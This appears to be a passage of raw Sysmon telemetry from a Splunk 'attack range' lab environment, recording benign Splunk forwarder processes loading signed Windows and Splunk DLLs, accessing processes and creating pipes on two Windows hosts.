19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606232Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606231Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606230Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606229Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606228Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606227Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606226Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606225Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606224Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606223Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606222Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606221Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606220Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606219Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606218Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606217Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606216Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606215Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606214Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606213Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606212Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001606211Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000001606210Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606209Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001606208Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001606207Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001606206Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606205Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606204Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x80000000000000001606203Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095236Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095235Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606202Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606201Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606200Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606199Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x80000000000000001606198Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606197Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606196Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.343{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606195Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606194Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606193Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606192Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606191Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606190Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:30.343{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x80000000000000001606368Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.715{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x80000000000000001606367Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.715{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001606366Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.715{21761711-7A87-6080-C560-00000000BB01}24282292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606365Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.699{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606364Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.699{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606363Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.594{21761711-7A87-6080-C560-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 